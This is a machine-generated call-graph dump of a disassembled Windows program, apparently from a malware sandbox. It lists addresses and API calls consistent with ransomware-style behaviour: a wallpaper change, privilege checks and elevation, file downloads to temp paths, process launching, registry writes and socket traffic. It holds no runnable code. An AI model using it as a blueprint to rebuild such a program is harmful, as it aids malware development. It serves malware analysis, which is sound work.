402bde 5728->5729 5729->5682 5731 402dbf 5730->5731 5739 402f10 5731->5739 5733 402de4 5733->5700 5735 402ed0 #825 5734->5735 5736 402eb1 5734->5736 5735->5686 5737 402ec4 #825 5736->5737 5738 402ebd 5736->5738 5737->5735 5738->5735 5740 402f40 5739->5740 5747 403044 5739->5747 5741 402f68 5740->5741 5746 402fdb 5740->5746 5743 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5741->5743 5744 402f6e ?_Xran@std@ 5741->5744 5742 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5742->5747 5748 402f85 5743->5748 5744->5743 5745 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 5745->5733 5746->5742 5749 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 5746->5749 5747->5733 5748->5745 5750 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 5748->5750 5751 403006 5749->5751 5750->5745 5752 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 5750->5752 5751->5733 5752->5745 5754 404770 3 API calls 5753->5754 5755 401fac 5754->5755 5756 404770 3 API calls 5755->5756 5757 401fb4 5756->5757 5757->5757 5759 401fe3 5757->5759 5760 401fd0 GlobalFree 5757->5760 5758 40200c 5758->5525 5759->5758 5761 401ff9 GlobalFree 5759->5761 5760->5759 5761->5758 5762->5527 5763->5529 6016 403560 6017 40358c #4376 6016->6017 6018 40356e GetExitCodeThread 6016->6018 6019 403593 6017->6019 6018->6017 6018->6019 6402 409f60 RectVisible 6403 401760 #6453 6404 401791 WaitForSingleObject TerminateThread CloseHandle 6403->6404 6405 4017b8 6403->6405 6404->6405 6406 40193e 6405->6406 6407 4018f6 6405->6407 6408 4017d8 sprintf fopen 6405->6408 6409 401915 6407->6409 6412 401903 rand 6407->6412 6410 401834 8 API calls 6408->6410 6411 4018da #1200 6408->6411 6409->6406 6413 401939 #1200 6409->6413 6410->6406 6411->6406 6412->6409 6413->6406 5764 404070 #693 5765 404088 5764->5765 5766 40407f #825 5764->5766 5766->5765 5767 40a070 DrawTextA 6021 408d70 6022 408e09 GetDeviceCaps 6021->6022 6024 408eb0 6022->6024 6030 408ed8 6022->6030 6025 408eba GetDeviceCaps GetDeviceCaps 6024->6025 6024->6030 6025->6030 6026 4090b6 #2414 6027 408f51 _ftol _ftol 6027->6030 6028 408fca _ftol _ftol _ftol 6029 409024 CreateSolidBrush #1641 6028->6029 6028->6030 6029->6030 6030->6026 6030->6027 6030->6028 6031 409048 FillRect #2414 6030->6031 6032 409083 #2754 6030->6032 6031->6030 6032->6030 6150 404670 6155 404690 DeleteCriticalSection 6150->6155 6152 404678 6153 404688 6152->6153 6154 40467f #825 6152->6154 6154->6153 6155->6152 6414 409b70 #2379 6421 403f70 6426 403f90 #2414 6421->6426 6423 403f78 6424 403f88 6423->6424 6425 403f7f #825 6423->6425 6425->6424 6426->6423 6427 404f70 #4476 6428 404f91 6427->6428 6429 404fc7 #3089 6427->6429 6428->6429 6430 404f9b 6428->6430 6156 403271 #2302 #2302 6157 406a00 #4476 6158 406a23 6157->6158 6160 406a62 6157->6160 6159 406a38 #3089 6158->6159 6158->6160 6159->6160 6161 406a46 #3089 6159->6161 6161->6160 6162 406a54 #3089 6161->6162 6162->6160 6163 401600 6164 4016e5 6163->6164 6165 40161a 6163->6165 6166 4016e9 #537 6164->6166 6170 4016de 6164->6170 6167 40161d 6165->6167 6168 40168f 6165->6168 6186 401970 #3092 #6199 #800 6166->6186 6172 401743 #2385 6167->6172 6175 401628 #537 6167->6175 6176 40165e 6167->6176 6169 401693 #537 6168->6169 6168->6170 6185 401970 #3092 #6199 #800 6169->6185 6170->6172 6174 401701 SendMessageA #2385 6183 401970 #3092 #6199 #800 6175->6183 6176->6170 6179 401663 #537 6176->6179 6177 4016ab SendMessageA #2385 6184 401970 #3092 #6199 #800 6179->6184 6180 401640 #2385 6182 40167b #2385 6183->6180 6184->6182 6185->6177 6186->6174 6431 403f00 6436 403f20 #2414 6431->6436 6433 403f08 6434 403f18 6433->6434 6435 403f0f #825 6433->6435 6435->6434 6436->6433 4758 413102 __set_app_type __p__fmode __p__commode 4759 413171 4758->4759 4760 413185 4759->4760 4761 413179 __setusermatherr 4759->4761 4770 4133b2 _controlfp 4760->4770 4761->4760 4763 41318a _initterm __getmainargs _initterm 4764 4131de GetStartupInfoA 4763->4764 4766 413212 GetModuleHandleA 4764->4766 4771 4133e6 #1576 4766->4771 4769 413236 exit _XcptFilter 4770->4763 4771->4769 5768 403810 WideCharToMultiByte 5771 403e60 SendMessageA #3998 SendMessageA 5768->5771 5770 403845 5771->5770 5772 403410 #4476 5773 403454 #3089 5772->5773 5774 403431 5772->5774 5775 40343b 5773->5775 5774->5773 5774->5775 5776 404410 SetCursor 6033 401110 #2302 6437 404310 6438 404333 6437->6438 6439 40433a #470 #5789 #5875 #6172 6437->6439 6440 4044c0 7 API calls 6438->6440 6441 40438a #5789 #755 6439->6441 6440->6439 6442 401f10 6443 401f30 6 API calls 6442->6443 6444 401f18 6443->6444 6445 401f28 6444->6445 6446 401f1f #825 6444->6446 6446->6445 6193 40ca19 6194 40ca26 6193->6194 6195 40ca28 #823 6193->6195 6194->6195 6038 409920 6043 4098c0 6038->6043 6041 409938 6042 40992f #825 6042->6041 6044 4098f2 #5875 6043->6044 6045 4098fb 6043->6045 6044->6045 6045->6041 6045->6042 5777 40a020 TabbedTextOutA 5778 409c20 #3797 5779 409c40 #6734 5778->5779 5780 409c36 5778->5780 5781 409c5b SendMessageA 5779->5781 5782 409c78 5779->5782 5781->5782 5783 409ce4 5782->5783 5784 409caa 5782->5784 5785 409cf6 5783->5785 5786 409ce8 InvalidateRect 5783->5786 5787 409cd4 #4284 5784->5787 5788 409cc4 #4284 5784->5788 5786->5785 5787->5785 5788->5785 6215 409a20 6220 4099c0 6215->6220 6218 409a38 6219 409a2f #825 6219->6218 6221 409a03 6220->6221 6222 4099f3 #6170 6220->6222 6221->6218 6221->6219 6222->6221 6451 409b20 6452 409b31 6451->6452 6453 409b33 #6140 6451->6453 6452->6453 6196 401220 6197 4012c2 #2379 6196->6197 6198 401233 6196->6198 6199 401243 SendMessageA KillTimer #4853 6198->6199 6200 40126b SendMessageA 6198->6200 6199->6200 6201 401285 SendMessageA 6200->6201 6202 401297 6200->6202 6201->6202 6202->6197 6203 4012a1 SendMessageA 6202->6203 6203->6197 6204 4012b8 6203->6204 6204->6197 6205 405a20 6206 405a25 6205->6206 6209 4130bb 6206->6209 6212 41308f 6209->6212 6211 405a4a 6213 4130a4 __dllonexit 6212->6213 6214 413098 _onexit 6212->6214 6213->6211 6214->6211 6223 404620 #795 6224 404638 6223->6224 6225 40462f #825 6223->6225 6225->6224 5789 408c20 5794 408b40 5789->5794 5791 408c28 5792 408c38 5791->5792 5793 408c2f #825 5791->5793 5793->5792 5795 408bd0 5794->5795 5796 408b78 BitBlt 5794->5796 5798 408bd6 #2414 #640 5795->5798 5799 408bc1 #5785 5796->5799 5800 408bb5 #5785 5796->5800 5798->5791 5799->5798 5800->5798 5801 413427 5802 41342c 5801->5802 5805 4133fe #1168 5802->5805 5806 413421 5805->5806 5807 413418 _setmbcp 5805->5807 5807->5806 5811 407c30 OpenClipboard 5812 407c42 GlobalAlloc 5811->5812 5813 407ca9 5811->5813 5814 407c64 EmptyClipboard GlobalLock GlobalUnlock SetClipboardData CloseClipboard 5812->5814 5815 407c5b CloseClipboard 5812->5815 5814->5813 5808 40d830 inet_addr 5809 40d844 gethostbyname 5808->5809 5810 40d84f 5808->5810 5809->5810 5816 404430 5817 40447b 5816->5817 5818 40443d _TrackMouseEvent #2379 5816->5818 5821 404489 5817->5821 5823 404530 5817->5823 5822 4044a1 SetCursor #2379 5821->5822 5824 4045c1 5823->5824 5825 404552 5823->5825 5824->5821 5825->5824 5826 404559 #289 #5789 GetTextExtentPoint32A #5789 #613 5825->5826 5826->5824 6046 406930 #6215 6047 402d30 6048 402d73 #825 6047->6048 6049 402d3f 6047->6049 6050 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6049->6050 6050->6050 6051 402d72 6050->6051 6051->6048 6226 405230 6233 405369 6226->6233 6236 40525a 6226->6236 6227 405552 InvalidateRect 6232 405560 6227->6232 6228 405285 6229 4052ee 7 API calls 6228->6229 6230 40528f #4277 #923 #858 #800 #800 6228->6230 6229->6227 6230->6227 6231 40539e 6234 405430 6231->6234 6235 4053aa 7 API calls 6231->6235 6233->6227 6233->6231 6240 405390 #940 6233->6240 6237 4054b4 6234->6237 6238 405435 7 API calls 6234->6238 6235->6227 6236->6228 6239 405277 #940 6236->6239 6241 4054b8 6237->6241 6243 405503 6237->6243 6238->6227 6239->6228 6239->6239 6240->6231 6240->6240 6241->6227 6242 4054de #6778 #6648 6241->6242 6242->6242 6244 405501 6242->6244 6243->6227 6243->6232 6245 405529 #6778 #6648 6243->6245 6244->6227 6245->6227 6245->6245 6246 40d630 6251 40d650 6246->6251 6248 40d638 6249 40d648 6248->6249 6250 40d63f #825 6248->6250 6250->6249 6252 40dad0 4 API calls 6251->6252 6253 40d680 6252->6253 6253->6248 6052 402531 6053 402543 6052->6053 6054 40253c CloseHandle 6052->6054 6055 402555 6053->6055 6056 40254e CloseHandle 6053->6056 6054->6053 6056->6055 6254 40ca3a 6257 40ca40 6254->6257 6255 40ca81 6256 40ca87 #825 6256->6255 6257->6255 6257->6256 5827 4068c0 #4837 6258 4032c0 6 API calls 6259 403334 SendMessageA #3092 6258->6259 6261 40335c SendMessageA #3092 6259->6261 6263 40337b SendMessageA #3092 6261->6263 6265 4033a0 SendMessageA 6263->6265 6266 40339d 6263->6266 6269 403cb0 FindFirstFileA 6265->6269 6266->6265 6268 4033b2 SendMessageA #3996 SendMessageA 6270 403cd9 6269->6270 6271 403ce3 6269->6271 6270->6268 6272 403e1f FindNextFileA 6271->6272 6274 403d14 sscanf 6271->6274 6272->6271 6273 403e3a FindClose 6272->6273 6273->6268 6274->6272 6275 403d38 fopen 6274->6275 6275->6272 6276 403d5c fread 6275->6276 6277 403e15 fclose 6276->6277 6281 403d7b 6276->6281 6277->6272 6278 403d8f sprintf 6279 403dd4 SendMessageA #823 SendMessageA 6278->6279 6279->6277 6281->6277 6281->6278 6281->6279 6282 401c30 inet_ntoa 6281->6282 6282->6281 6454 4043c0 #6453 #2414 6455 409fc0 TextOutA 4772 4064d0 #4710 SendMessageA SendMessageA 4816 401c70 wcscat 4772->4816 4774 406516 4775 406577 4774->4775 4776 40651d GetModuleFileNameA strrchr 4774->4776 4825 401a10 4775->4825 4777 40656c SetCurrentDirectoryA 4776->4777 4778 40655d strrchr 4776->4778 4777->4775 4778->4777 4780 406585 4781 4065e5 4780->4781 4782 40658c time 4780->4782 4835 402c40 4781->4835 4783 401a10 5 API calls 4782->4783 4783->4781 4785 4065ed __p___argc 4786 406606 4785->4786 4787 40678c 4786->4787 4788 40660f __p___argv 4786->4788 4883 407e80 SHGetFolderPathW wcslen 4787->4883 4790 406621 4788->4790 4793 406661 __p___argv 4790->4793 4794 406652 4790->4794 4791 406793 SetWindowTextW 4886 406f80 4791->4886 4797 40666d 4793->4797 4859 407f80 fopen 4794->4859 4795 4067a9 4944 406c20 GetUserDefaultLangID GetLocaleInfoA 4795->4944 4801 4066ad __p___argv 4797->4801 4802 40669e 4797->4802 4800 4067b0 SetTimer SetTimer 4804 4066b9 4801->4804 4841 4080c0 FindFirstFileA 4802->4841 4804->4787 4807 4066ee Sleep 4804->4807 4869 401bb0 AllocateAndInitializeSid 4807->4869 4809 406734 4810 406750 sprintf 4809->4810 4811 406738 4809->4811 4875 401a90 CreateProcessA 4810->4875 4874 401b50 ShellExecuteExA 4811->4874 4814 40674b ExitProcess 4817 401cdc 4816->4817 4818 401d00 RegCreateKeyW 4817->4818 4819 401d62 RegQueryValueExA 4817->4819 4820 401d1d GetCurrentDirectoryA RegSetValueExA 4817->4820 4821 401dbb 4817->4821 4818->4817 4822 401d9e RegCloseKey 4819->4822 4823 401d90 SetCurrentDirectoryA 4819->4823 4820->4822 4821->4774 4822->4817 4824 401dc8 4822->4824 4823->4822 4824->4774 4826 401a1a fopen 4825->4826 4828 401a3a 4826->4828 4829 401a6f 4826->4829 4830 401a53 fwrite 4828->4830 4831 401a46 fread 4828->4831 4829->4780 4832 401a5e 4830->4832 4831->4832 4833 401a74 fclose 4832->4833 4834 401a66 fclose 4832->4834 4833->4780 4834->4829 4953 404b70 4835->4953 4837 402c46 4838 402c57 4837->4838 4839 402c5e LoadLibraryA 4837->4839 4838->4785 4839->4838 4840 402c73 7 API calls 4839->4840 4840->4838 4842 40820a 4841->4842 4854 408124 4841->4854 4958 401e30 4842->4958 4845 4081e4 FindNextFileA 4846 4081ff FindClose 4845->4846 4845->4854 4846->4842 4847 401e30 2 API calls 4849 408255 sprintf #537 4847->4849 4848 408158 sscanf 4848->4845 4850 408178 fopen 4848->4850 4963 4082c0 4849->4963 4850->4845 4852 408190 fread 4850->4852 4852->4854 4855 4081bd fclose 4852->4855 4854->4845 4854->4848 4854->4855 4855->4845 4855->4854 4856 408291 #537 4858 4082c0 141 API calls 4856->4858 4857 4066a5 ExitProcess 4858->4857 4860 407fd0 fread fclose 4859->4860 4868 406659 ExitProcess 4859->4868 5333 40be90 strncpy strncpy strncpy 4860->5333 4862 408002 5334 40c4f0 4862->5334 4864 40801d 4865 40c4f0 112 API calls 4864->4865 4866 408041 4864->4866 4865->4866 4867 401a10 5 API calls 4866->4867 4866->4868 4867->4868 4870 401bf6 4869->4870 4871 401bfb CheckTokenMembership 4869->4871 4870->4809 4872 401c10 4871->4872 4873 401c14 FreeSid 4871->4873 4872->4873 4873->4809 4874->4814 4876 401b45 4875->4876 4877 401aed 4875->4877 4876->4814 4878 401af5 WaitForSingleObject 4877->4878 4879 401b26 CloseHandle CloseHandle 4877->4879 4880 401b12 4878->4880 4881 401b05 TerminateProcess 4878->4881 4879->4814 4880->4879 4882 401b1a GetExitCodeProcess 4880->4882 4881->4880 4882->4879 4884 407f02 4883->4884 4885 407f09 swprintf MultiByteToWideChar CopyFileW SystemParametersInfoW 4883->4885 4884->4791 4885->4791 5348 4076a0 4886->5348 4888 406fa8 27 API calls 4889 407119 4888->4889 4890 40711c SendMessageA #3092 4888->4890 4889->4890 4891 40713d SendMessageA #3092 4890->4891 4893 40715f SendMessageA #3092 4891->4893 4895 407181 SendMessageA #3092 4893->4895 4897 4071a3 SendMessageA #3092 4895->4897 4899 4071c5 SendMessageA #3092 4897->4899 4901 4071e7 4899->4901 4902 4071ea SendMessageA #3092 4899->4902 4901->4902 4903 407205 SendMessageA #3092 4902->4903 4905 407227 SendMessageA #3092 4903->4905 4907 407249 SendMessageA #3092 4905->4907 4909 40726b 4907->4909 4910 40726e SendMessageA #860 4907->4910 4909->4910 4911 4072a4 4910->4911 4912 4072ed #537 4911->4912 5364 404210 #858 #800 4912->5364 4914 407309 #537 5365 404210 #858 #800 4914->5365 4916 407325 #540 #2818 #535 5366 404210 #858 #800 4916->5366 4918 407369 5367 404270 4918->5367 4922 4073a8 SendMessageA SendMessageA #6140 #6140 4923 407428 4922->4923 5371 405920 4923->5371 4927 407457 5379 4058c0 4927->5379 4929 407460 5382 405180 _mbscmp 4929->5382 4931 407477 4932 405920 2 API calls 4931->4932 4933 4074ac 4932->4933 4934 405860 2 API calls 4933->4934 4935 4074b5 4934->4935 4936 4058c0 2 API calls 4935->4936 4937 4074be 4936->4937 4938 405180 4 API calls 4937->4938 4939 4074d5 GetTimeZoneInformation 4938->4939 5388 401e60 VariantTimeToSystemTime 4939->5388 4941 407508 SystemTimeToTzSpecificLocalTime #2818 5389 401e60 VariantTimeToSystemTime 4941->5389 4943 40759b SystemTimeToTzSpecificLocalTime #2818 #6334 #800 4943->4795 4945 406c81 SendMessageA 4944->4945 4946 406c5d 4944->4946 4947 406cc1 SendMessageA 4945->4947 4948 406ca1 SendMessageA 4945->4948 4946->4945 4950 406ae0 27 API calls 4947->4950 5396 406ae0 8 API calls 4948->5396 4951 406cdd 4950->4951 4951->4800 4952 406cba 4952->4800 4954 404b81 LoadLibraryA 4953->4954 4955 404b7a 4953->4955 4956 404b96 6 API calls 4954->4956 4957 404bf6 4954->4957 4955->4837 4956->4957 4957->4837 4990 401e60 VariantTimeToSystemTime 4958->4990 4960 401e42 4991 401de0 sprintf 4960->4991 4962 401e51 4962->4847 4964 408337 4963->4964 4965 4082fb #4278 #858 #800 4963->4965 4966 408344 4964->4966 4967 408378 time 4964->4967 4965->4964 4968 408359 #800 4966->4968 4969 40834d #1200 4966->4969 4970 40839c 4967->4970 4971 40844d time 4967->4971 4972 40828c 4968->4972 4969->4968 4970->4971 4973 4083a9 4970->4973 4971->4973 4974 408466 4971->4974 4972->4856 4972->4857 4975 4083bb 4973->4975 4976 40846c fopen 4973->4976 4974->4976 4977 4083c4 #540 time #2818 #1200 #800 4975->4977 4978 40842e #800 4975->4978 4979 4084b5 fread fclose 4976->4979 4980 408496 #800 4976->4980 4977->4978 4978->4972 4992 40be90 strncpy strncpy strncpy 4979->4992 4980->4972 4982 4084e7 4993 40c060 4982->4993 4984 408501 4985 408516 4984->4985 4986 408538 4984->4986 4987 408549 #800 4985->4987 4988 40851a #1200 time 4985->4988 4986->4987 4989 40853c #1200 4986->4989 4987->4972 4988->4987 4989->4987 4990->4960 4991->4962 4992->4982 4994 40c07f 4993->4994 5020 40bed0 4994->5020 4996 40c0ba 4997 40c0c1 4996->4997 4998 40c0e7 4996->4998 4999 40c0cc SendMessageA 4997->4999 5002 40c0db 4997->5002 5000 40c104 4998->5000 5001 40c0f8 SendMessageA 4998->5001 4999->5002 5039 40dd00 5000->5039 5001->5000 5004 40dbf0 free 5002->5004 5005 40c173 5004->5005 5005->4984 5006 40c116 5007 40c144 5006->5007 5008 40c17b 5006->5008 5009 40c154 5007->5009 5010 40c148 SendMessageA 5007->5010 5011 40c18b 5008->5011 5012 40c17f SendMessageA 5008->5012 5042 40dbf0 5009->5042 5010->5009 5014 40c1b4 5011->5014 5015 40c1e8 5011->5015 5012->5011 5016 40c1c4 5014->5016 5017 40c1b8 SendMessageA 5014->5017 5015->5002 5018 40c1f5 SendMessageA 5015->5018 5019 40dbf0 free 5016->5019 5017->5016 5018->5002 5019->5005 5021 40bef5 5020->5021 5022 40bf0a #823 5020->5022 5021->5022 5023 40bf2e 5022->5023 5024 40bf27 5022->5024 5026 40bf46 5023->5026 5050 40baf0 5023->5050 5046 40d5e0 5024->5046 5026->4996 5029 40bf72 5029->4996 5030 40bf8a GetComputerNameA GetUserNameA 5082 40dc00 5030->5082 5033 40dd00 4 API calls 5034 40c01f 5033->5034 5035 40dc00 4 API calls 5034->5035 5036 40c038 5035->5036 5037 40dd00 4 API calls 5036->5037 5038 40c047 5037->5038 5038->4996 5040 40dc00 4 API calls 5039->5040 5041 40dd1c 5040->5041 5041->5006 5043 40dd70 5042->5043 5044 40dd8b 5043->5044 5329 412ac0 5043->5329 5044->5005 5047 40d602 5046->5047 5091 40dad0 5047->5091 5094 40ba10 5050->5094 5052 40bdf5 5052->5029 5052->5030 5053 40bb14 5053->5052 5054 40bb42 5053->5054 5099 40ba60 5053->5099 5054->5052 5103 40c8f0 #823 5054->5103 5058 40bc1b strtok 5060 40bc30 5058->5060 5074 40bbb7 5058->5074 5059 40ba60 closesocket 5062 40bc8b 5059->5062 5060->5059 5064 40bcec GetTickCount srand 5060->5064 5063 40bc92 5062->5063 5062->5064 5125 40c860 5063->5125 5066 40bdc7 5064->5066 5067 40bd07 rand 5064->5067 5070 40c860 2 API calls 5066->5070 5071 40bd1e 5067->5071 5069 40bcd8 #825 5069->5052 5073 40bde8 #825 5070->5073 5076 40ba60 closesocket 5071->5076 5079 40be11 5071->5079 5131 40ce50 5071->5131 5073->5052 5074->5058 5075 40c7b0 #825 5074->5075 5105 40c7b0 5074->5105 5109 40c920 5074->5109 5121 40c800 #823 5074->5121 5075->5058 5076->5071 5077 40be75 #825 5077->5052 5079->5077 5137 40c740 5079->5137 5083 40dc15 5082->5083 5089 40c013 5082->5089 5084 40dc77 5083->5084 5085 40dc49 5083->5085 5083->5089 5328 412aa0 realloc 5084->5328 5327 412a90 malloc 5085->5327 5088 40dc51 5088->5089 5090 40dc8d ??0exception@@QAE@ABQBD _CxxThrowException 5088->5090 5089->5033 5090->5089 5092 40d61e 5091->5092 5093 40dadf setsockopt send shutdown closesocket 5091->5093 5092->5023 5093->5092 5095 40ba27 5094->5095 5096 40ba2b 5095->5096 5142 40b840 sprintf GetFileAttributesA 5095->5142 5096->5053 5098 40ba31 5098->5053 5100 40ba88 5099->5100 5263 40d8c0 5100->5263 5104 40bb62 strtok 5103->5104 5104->5060 5104->5074 5106 40c7d0 5105->5106 5107 40c7bb 5105->5107 5106->5074 5107->5106 5108 40c7d6 #825 5107->5108 5108->5106 5110 40c932 5109->5110 5111 40c92d ?_Xlen@std@ 5109->5111 5112 40c973 5110->5112 5113 40c963 5110->5113 5114 40c946 5110->5114 5111->5110 5117 40c990 5112->5117 5118 40c7b0 #825 5112->5118 5115 40c7b0 #825 5113->5115 5119 40c94a 5114->5119 5267 40c9c0 5114->5267 5116 40c96c 5115->5116 5116->5074 5117->5074 5118->5114 5119->5074 5122 40c81f 5121->5122 5273 40cad0 5122->5273 5124 40c844 5124->5074 5126 40c870 5125->5126 5127 40c8d9 5125->5127 5128 40c8ab #825 5126->5128 5129 40c8a2 #825 5126->5129 5127->5069 5128->5126 5130 40c8cc 5128->5130 5129->5128 5130->5069 5132 40ce68 5131->5132 5133 40ce5a 5131->5133 5135 40ce94 #825 5132->5135 5136 40bd9e #825 Sleep 5132->5136 5133->5132 5134 40ce6e #825 5133->5134 5134->5132 5135->5136 5136->5066 5136->5067 5138 40c761 5137->5138 5139 40c77e #825 5137->5139 5140 40c775 #825 5138->5140 5141 40c76f 5138->5141 5139->5079 5140->5139 5141->5139 5143 40b898 5142->5143 5144 40b95b CreateProcessA 5142->5144 5160 40b6a0 CreateDirectoryA 5143->5160 5146 40b9b4 5144->5146 5147 40b9bf WaitForSingleObject 5144->5147 5146->5098 5148 40b9e4 CloseHandle CloseHandle 5147->5148 5149 40b9d8 WaitForSingleObject 5147->5149 5148->5098 5149->5148 5150 40b8a9 5151 40b8b0 5150->5151 5152 40b8e9 sprintf GetFileAttributesA 5150->5152 5174 40b780 CreateDirectoryA 5151->5174 5154 40b946 CopyFileA 5152->5154 5155 40b93b 5152->5155 5154->5144 5155->5098 5156 40b8c1 5156->5152 5157 40b780 60 API calls 5156->5157 5158 40b8d9 5157->5158 5158->5152 5159 40b8e0 5158->5159 5159->5098 5182 412920 5160->5182 5163 40b6d8 DeleteFileA 5163->5150 5164 40b6ec 5185 412940 5164->5185 5166 40b719 5166->5150 5167 40b76a 5194 412a00 5167->5194 5168 412940 14 API calls 5170 40b738 sprintf 5168->5170 5191 4129e0 5170->5191 5171 40b770 5171->5150 5173 40b70e 5173->5166 5173->5167 5173->5168 5175 40b81b 5174->5175 5176 40b7ae GetTempFileNameA DeleteUrlCacheEntry URLDownloadToFileA 5174->5176 5175->5156 5177 40b810 DeleteFileA 5176->5177 5178 40b7f6 5176->5178 5177->5175 5179 40b6a0 54 API calls 5178->5179 5180 40b809 5179->5180 5180->5177 5181 40b827 DeleteFileA 5180->5181 5181->5156 5205 4127e0 #823 5182->5205 5184 40b6cf 5184->5163 5184->5164 5186 412964 5185->5186 5187 412959 5185->5187 5188 412969 5186->5188 5218 411cf0 5186->5218 5187->5173 5188->5173 5190 412982 5190->5173 5251 412990 5191->5251 5193 4129f8 5193->5173 5195 412a15 5194->5195 5196 412a09 5194->5196 5197 412a1a 5195->5197 5257 4127a0 5195->5257 5196->5171 5197->5171 5200 412a7d #825 5200->5171 5201 412a44 #825 5202 412a4d 5201->5202 5203 412a61 #825 5202->5203 5204 412a6a #825 5202->5204 5203->5204 5204->5200 5206 412815 5205->5206 5207 41287a 5205->5207 5206->5207 5208 41283d #823 5206->5208 5209 411c00 15 API calls 5207->5209 5208->5207 5210 41289d 5209->5210 5211 4128a6 5210->5211 5212 4128f8 #823 5210->5212 5213 4128e5 5211->5213 5214 4128b4 #825 5211->5214 5215 4128bd 5211->5215 5212->5184 5213->5184 5214->5215 5216 4128d6 #825 5215->5216 5217 4128cd #825 5215->5217 5216->5213 5217->5216 5219 412231 5218->5219 5220 411d11 5218->5220 5219->5190 5220->5219 5221 411ac0 free free 5220->5221 5224 411d27 5220->5224 5221->5224 5222 411d37 5222->5190 5223 411dc2 5225 411ddc 5223->5225 5227 4113e0 SetFilePointer SetFilePointer ReadFile 5223->5227 5224->5222 5224->5223 5226 411390 SetFilePointer SetFilePointer ReadFile 5224->5226 5228 411350 SetFilePointer SetFilePointer ReadFile 5225->5228 5226->5223 5227->5223 5229 411dfe 5228->5229 5230 411460 SetFilePointer SetFilePointer ReadFile 5229->5230 5231 411e15 5230->5231 5232 411e1c 5231->5232 5233 410a50 SetFilePointer SetFilePointer 5231->5233 5232->5190 5234 411e3e 5233->5234 5235 411e45 5234->5235 5236 411e56 #823 5234->5236 5235->5190 5237 410af0 ReadFile 5236->5237 5238 411e78 5237->5238 5239 411e83 #825 5238->5239 5240 411e9d _mbsstr 5238->5240 5239->5190 5242 411f15 _mbsstr 5240->5242 5242->5240 5243 411f2c _mbsstr 5242->5243 5243->5240 5244 411f43 _mbsstr 5243->5244 5244->5240 5245 411f5a 5244->5245 5246 411b80 SystemTimeToFileTime 5245->5246 5247 412063 LocalFileTimeToFileTime 5246->5247 5250 4120b6 5247->5250 5248 412203 5248->5190 5249 4121fa #825 5249->5248 5250->5248 5250->5249 5252 4129a3 5251->5252 5253 412998 5251->5253 5254 4129a8 5252->5254 5255 412360 28 API calls 5252->5255 5253->5193 5254->5193 5256 4129cf 5255->5256 5256->5193 5258 4127b1 5257->5258 5259 4127a9 5257->5259 5261 4127c7 5258->5261 5262 410f70 FindCloseChangeNotification #825 free free free 5258->5262 5260 411ac0 free free 5259->5260 5260->5258 5261->5200 5261->5201 5261->5202 5262->5261 5265 40d8ec 5263->5265 5264 40daad closesocket 5266 40baa8 5264->5266 5265->5264 5265->5266 5266->5054 5268 40c9f6 #823 5267->5268 5272 40ca40 5268->5272 5270 40ca81 5270->5117 5271 40ca87 #825 5271->5270 5272->5270 5272->5271 5274 40cbf3 5273->5274 5275 40cb00 5273->5275 5274->5124 5276 40cb26 5275->5276 5282 40cb90 5275->5282 5277 40cb31 5276->5277 5278 40cb2c ?_Xran@std@ 5276->5278 5292 40cd80 5277->5292 5278->5277 5279 40cbe9 5281 40cc60 5 API calls 5279->5281 5281->5274 5282->5279 5284 40cbaa 5282->5284 5283 40cb38 5286 40cb6a 5283->5286 5287 40cb47 memmove 5283->5287 5285 40c7b0 #825 5284->5285 5288 40cbb3 5285->5288 5290 40cd80 4 API calls 5286->5290 5309 40cc60 5287->5309 5288->5124 5291 40cb7d 5290->5291 5291->5124 5293 40cd93 5292->5293 5294 40ce27 5292->5294 5293->5294 5295 40cdd0 5293->5295 5296 40cdc9 ?_Xlen@std@ 5293->5296 5294->5283 5297 40cdf8 5295->5297 5300 40cde2 5295->5300 5296->5295 5298 40ce0a 5297->5298 5299 40cdfc 5297->5299 5298->5294 5305 40c7b0 #825 5298->5305 5301 40c7b0 #825 5299->5301 5302 40cde6 5300->5302 5303 40ce1f 5300->5303 5304 40ce05 5301->5304 5306 40c7b0 #825 5302->5306 5307 40c9c0 2 API calls 5303->5307 5304->5283 5305->5303 5308 40cdf3 5306->5308 5307->5294 5308->5283 5310 40cc73 5309->5310 5311 40cc6e ?_Xlen@std@ 5309->5311 5312 40cd04 5310->5312 5313 40cc88 5310->5313 5314 40ccae 5310->5314 5311->5310 5312->5313 5319 40cd08 5312->5319 5315 40cc90 5313->5315 5318 40c9c0 2 API calls 5313->5318 5317 40ccd9 #825 5314->5317 5321 40ccc4 5314->5321 5315->5286 5316 40cd4c 5322 40c9c0 2 API calls 5316->5322 5317->5321 5318->5315 5319->5315 5319->5316 5320 40cd43 #825 5319->5320 5323 40cd26 5319->5323 5320->5316 5321->5286 5324 40cd5d 5322->5324 5325 40c9c0 2 API calls 5323->5325 5324->5286 5326 40cd3b 5325->5326 5326->5286 5327->5088 5328->5088 5330 412af5 5329->5330 5331 412ac8 free 5329->5331 5330->5044 5331->5330 5333->4862 5335 40c50f 5334->5335 5336 40bed0 110 API calls 5335->5336 5337 40c54b 5336->5337 5338 40c596 5337->5338 5339 40dd00 4 API calls 5337->5339 5340 40dbf0 free 5338->5340 5342 40c568 5339->5342 5341 40c5e7 5340->5341 5341->4864 5342->5338 5343 40c600 5342->5343 5344 40c635 5343->5344 5345 40c617 strncpy 5343->5345 5346 40dbf0 free 5344->5346 5345->5344 5347 40c650 5346->5347 5347->4864 5349 4076d9 time 5348->5349 5351 4076d7 5349->5351 5350 407771 sprintf 5350->5351 5351->5349 5351->5350 5352 405180 4 API calls 5351->5352 5353 407842 SendMessageA SendMessageA #540 5351->5353 5352->5351 5354 407894 5353->5354 5355 4078aa _ftol #2818 #2818 5354->5355 5356 4078db #2818 #2818 5354->5356 5357 407911 #3092 #6199 5355->5357 5356->5357 5358 407990 #800 5357->5358 5359 407940 5357->5359 5358->4888 5359->5358 5360 407952 InvalidateRect 5359->5360 5361 405920 2 API calls 5360->5361 5362 407978 5361->5362 5363 405920 2 API calls 5362->5363 5363->5358 5364->4914 